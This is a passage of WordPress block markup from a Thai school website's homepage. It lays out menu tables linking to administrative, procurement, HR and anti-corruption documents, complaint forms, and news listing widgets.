{\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe 